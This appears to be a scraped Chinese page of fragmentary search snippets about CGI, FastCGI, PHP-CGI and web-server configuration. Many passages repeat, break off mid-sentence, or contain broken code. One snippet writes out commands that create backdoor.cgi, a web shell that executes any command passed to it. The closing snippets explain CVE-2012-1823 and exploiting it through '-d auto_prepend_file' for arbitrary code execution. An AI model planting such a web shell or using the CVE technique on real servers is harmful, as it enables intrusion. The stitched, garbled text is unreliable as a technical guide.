关于CGI程序的几个疑问。
cookie操作:限制4kb,300个,每个域名20个 image.png cgi.escape image.png urllib.parse.quote_plus unquote_plus...image.png open().read() HTMLParser().unescape() image.png cgi.FieldStorage() xx.keys() image.png
Web服务器和CGI接口又另外设置了一些环境变量,用来向CGI程序传递一些重要的参 数。CGI的GET方法还通过环境变量QUERY-STRING向CGI程序传递Form中的数据。...lighttpd 配置 cgi, 打开cgi.conf, cgi.assign = (".cgi" => "") 设置 cgi 模块的扩展名和解释器。...下面是 test.c 代码: #include "stdio.h" #include "stdlib.h" #include int mian() { char *data...cgi 与 fastcgi CGI工作原理:每当客户请求CGI的时候,WEB服务器就请求操作系统生成一个新的CGI解释器进程(如php-cgi.exe),CGI 的一个进程则处理完一个请求后退出,下一个请求来时再创建新进程...在CGI模式中,php-cgi在此便退出了。
cd /tmp mkdir cgi-bin echo '#!/bin/bash' > ..../cgi-bin/backdoor.cgi echo 'echo -e "Content-Type: text/plain\n\n"' >> ..../cgi-bin/backdoor.cgi echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi chmod +x ..../cgi-bin/backdoor.cgi python -m http.server --cgi wget -q -O - "http://localhost:8000/cgi-bin/backdoor.cgi
定义 cgi 通用网关接口,外部程序与web服务器之间的接口标准,是在cgi程序和web服务器之间传递信息的过程 每一次请求都会生成一个cgi进程,cgi程序执行完,进程退出 独立于服务器、独立编程语言...可以同时处理多个请求 长期占用内存 php-cgi php官方自带的FastCGI 进程管理器 php.ini修改之后,必须kill掉php-cgi再启动php.ini 才生效。...以apache为例,首先要配置好cgi访问目录,访问 http://127.0.0.1/cgi-bin/printenv.pl 。...apache收到用户请求,开始调用cgi接口,处理cgi程序(printenv.pl),处理完了之后返回 cgi程序处理后的结果。...说一下我走过的一个坑,为了验证cgi程序,我特意编译了apache2.4 ,然后配置httpd.conf 但是访问cgi程序还是报错。主要原因就是。cgi文件,没有加上调用哪个程序执行 。
CGI 即 Common Gateway Interface,译作“通用网关接口” web服务器所处理的内容都是静态的,要想处理动态内容,需要依赖于web应用程序,如php、jsp、python、perl...它所依赖的就是cgi协议。没错,是协议,也就是web server和web应用程序交流时的规范。...web server会将这些程序参数和其它一些环境变量根据cgi协议通过TCP或套接字等方式传递给已启动的cgi程序(可能是cgi进程,或者是已加载的模块cgi模块)。...当cgi进程接收到web server的请求后,调用search程序并执行,同时还会传递参数给search程序。...search执行结束后,cgi进程/线程将处理结果返回给web server,web server再返回给浏览器。
Web服务器和CGI接口又另外设置了一些环境变量,用来向CGI程序传递一些重要的参 数。CGI的GET方法还通过环境变量QUERY-STRING向CGI程序传递Form中的数据。...lighttpd 配置 cgi, 打开cgi.conf, cgi.assign = (“.cgi” => “”) 设置 cgi 模块的扩展名和解释器。...下面是 test.c 代码: #include "stdio.h" #include "stdlib.h" #include int mian() { char *data; data...cgi 与 fastcgi CGI工作原理:每当客户请求CGI的时候,WEB服务器就请求操作系统生成一个新的CGI解释器进程(如php-cgi.exe),CGI 的一个进程则处理完一个请求后退出,下一个请求来时再创建新进程...在CGI模式中,php-cgi在此便退出了。
FastCGI与CGI特点 CGI,FastCGI也具有语言无关性。 CGI, FastCGI在进程中的应用程序,独立于核心web服务器运行,提供了一个比API更安全的环境。...(APIs把应用程序的代码与核心的web服务器链接在一起,这意味着在一个错误的API的应用程序可能会损坏其他应用程序或核心服务器; 恶意的API的应用程序代码甚至可以窃取另一个应用程序或核心服务器的密钥...FastCGI技术目前支持语言有:C/C++、Java、Perl、Tcl、Python、SmallTalk、Ruby等。...启动PHP-CGI,使用如下命令: php-cgi -b 127.0.0.1:9000 PHP-CGI的不足 php-cgi变更php.ini配置后需重启php-cgi才能让新的php-ini生效,不可以平滑重启...PHP-FPM其实是PHP源代码的一个补丁,旨在将FastCGI进程管理整合进PHP包中。必须将它patch到你的PHP源代码中,在编译安装PHP后才可以使用。
修改apache配置文件如下 cgi-bin"> AllowOverride None Options...Order allow,deny Allow from all AddType text/html .htm .html .py AddHandler cgi-script....cgi .py 编写hello_get.py,放在/usr/local/sae/httpd/htdocs/cgi-bin/目录下,赋予权限chmod a+x hello_get.py 代码: #!.../usr/bin/python import cgi import os import time import cStringIO import json form = cgi.FieldStorage
特别是当PHP部署在Windows平台,并处理如繁体中文(代码页950)、简体中文(代码页936)、日文(代码页932)等特定语言环境时,存在安全漏洞。...此漏洞为攻击者提供了可乘之机,允许他们通过精心构造的恶意请求来规避CVE-2012-1823的安全措施,进而通过参数注入等手段在受影响的PHP服务器上远程执行恶意代码。
众所周知,CGI解 释器的反复加载是CGI性能低下的主要原因,如果CGI解释器保持在内存中并接受FastCGI进程管理器调度,则可以提供良好的性能、伸缩性、 Fail- Over特性等等。...APIs把应用程序的代码与核心的web服务 器链接在一起,这意味着在一个错误的API的应用程序可能会损坏其他应用程序或核心服务器。...恶意的API的应用程序代码甚至可以窃取另一个应用程序或核心服务器的密钥。 FastCGI技术目前支持语言有:C/C++、Java、Perl、Tcl、Python、SmallTalk、Ruby等。...PHP-CGI的不足: php-cgi变更php.ini配置后需重启php-cgi才能让新的php-ini生效,不可以平滑重启。 直接杀死php-cgi进程,php就不能运行了。...PHP-FPM其实是PHP源代码的一个补丁,旨在将FastCGI进程管理整合进PHP包中。必须将它patch到你的PHP源代码中,在编译安装PHP后才可以使用。
/usr/bin/python # CGI处理模块 from os import environ import cgi, cgitb # 创建 FieldStorage 的实例化 form = cgi.FieldStorage...print("Set-Cookie:Path=/perl;\n") print('') print('') print('Hello Word - First CGI...This is my first CGI program') print("Hello %s %s" % (first_name, last_name)) print("User
虽然我们听说过Java的Servlet,Python的WSGI。但其实Java、Python都是支持CGI的,不仅如此,其他我们所熟知的语言大都也都支持。...CGI程序既是如此。 CGI程序通常部署到Web服务器(如Apache)上,Web服务器然后调用CGI程序,关于CGI程序到底如何从Web服务器中获得输入,请继续阅读下一节 Interface。...此时要注意的是,不要以为返回HTML页面,那么直接输出一段HTML代码就OK,注意。此时CGI的输出承担的是HTTP协议的响应部分,因此HTTP响应报头也要自己标准输出出来。...熟悉PHP的同学,肯定echo过HTML代码,没错,这很像。...Java发明的Servlet技术也是一种常驻内存的网关通信技术,只不过它采用的是多线程而非进程。
/"这个指令,指示了默认的cgi-bin的路径。...还需要配置 AddHandler cgi-script .cgi .pl 该配置默认被注释掉了,设置了cgi的后缀名 编写一个cgi文件,内容如下: #!...将该文件命名为first.cgi,然后放入/var/www/cgi-bin/目录中。...: first.cgi 说明了权限被拒绝了。...将first.cgi的权限设置成755 chmod 755 /var/www/cgi-bin/first.cgi 再次运行http://localhost:9000/cgi-bin/first.cgi,
问题背景我在 public-html 中运行了表单,并在 cgi-bin 中运行了 cgi 脚本。当我提交表单时,我收到一个空白页面。...以下是修改后的代码,在其中应用了第一种解决方案:#!.../usr/bin/python# Import modules for CGI handlingimport cgi, cgitb, sys# Create instance of FieldStorageform...The Values Selected are %s, %s, %s " % (tier, version, point))print("")print("")代码示例以下是完整的工作代码...出现这些问题的原因可能是多种多样的,但最常见的原因之一是代码中存在语法错误或逻辑错误。通过仔细检查代码并确保其正确无误,可以避免这些问题。
配置Nginx支持CGI 相信会特意看这篇文章的人对CGI是什么及其作用已经有了足够的了解,所以在这里不再赘述,直接开始配置。.../.*\.cgi$ { root /work/www/test; fastcgi_index index.cgi; fastcgi_param SCRIPT_FILENAME $...fastcgi_params.default/etc/nginx/nginx_fcgi_params 到这里其实已经完成工作了,但我现在的公司需要在网页上能够显示数学公式,所以,以下两步是添加一个名为mimetex.cgi...(可以在网上下载)的文件到/web/www/cgi-bin(如果没有此目录,请手动创建)下,有了这个文件系统才能将用户提交的“文本格式的公式”转换成“真正的公式” mkdir /etc/nginx cd.../web/www/cgi-bin/ chmod +x mimetex.cgi
一、CGI技术概述 CGI(Common Gateway Interface)是一种用于Web服务器与外部应用程序(CGI程序)之间进行交互的标准协议。...CGI程序通常被放置在Web服务器的特定目录(如cgi-bin)中,并通过特定的URL路径进行访问。...服务器识别与转发:Web服务器识别出这是一个需要CGI程序处理的请求,并将请求转发给相应的CGI程序。这通常是通过检查请求的URL路径是否指向cgi-bin目录或具有.cgi后缀来实现的。...CGI程序执行:Web服务器启动一个新的进程(或线程)来执行CGI程序。...CGI程序。
众所周知,CGI解释器的 反复加载是CGI性能低下的主要原因,如果CGI解释器保持在内存中并接受FastCGI进程管理器调度,则可以提供良好的性能、伸缩性、Fail- Over特性等等。...(APIs把应用程序的代码与核心的web服务器链接在一起,这意味着在一个错误的API的应用程序可能会损坏其他应用程序或核心服务器; 恶意的API的应用程序代码甚至可以窃取另一个应用程序或核心服务器的密钥...3、FastCGI技术目前支持语言有:C/C++、Java、Perl、Tcl、Python、SmallTalk、Ruby等。...管理器 PHP-CGI的不足 1、php-cgi变更php.ini配置后需重启php-cgi才能让新的php-ini生效,不可以平滑重启 2、直接杀死php-cgi进程,php就不能运行了。...PHP-FPM其实是PHP源代码的一个补丁,旨在将FastCGI进程管理整合进PHP包中。必须将它patch到你的PHP源代码中,在编译安装PHP后才可以使用。
CVE-2012-1823出来时据说是“PHP远程代码执行漏洞”,曾经也“轰动一时”,当时的我只是刚踏入安全门的一个小菜,直到前段时间tomato师傅让我看一个案例,我才想起来这个漏洞。...php有一个叫php-cgi的sapi,php-cgi有两个功能,一是提供cgi方式的交互,二是提供fastcgi方式的交互。...CVE-2012-1823就是php-cgi这个sapi出现的漏洞,我上面介绍了php-cgi提供的两种运行方式:cgi和fastcgi,本漏洞只出现在以cgi模式运行的php中。.../usr/local/bin/php-cgi -d include_path=/path的写法来进行测试,认为不应该限制php-cgi接受命令行参数,而且这个功能不和其他代码有任何冲突。...但阅读过我写的fastcgi那篇文章的同学应该很快就想到了一个更好的利用方法:通过使用-d指定auto_prepend_file来制造任意文件包含漏洞,执行任意代码: ?
领取专属 10元无门槛券
手把手带您无忧上云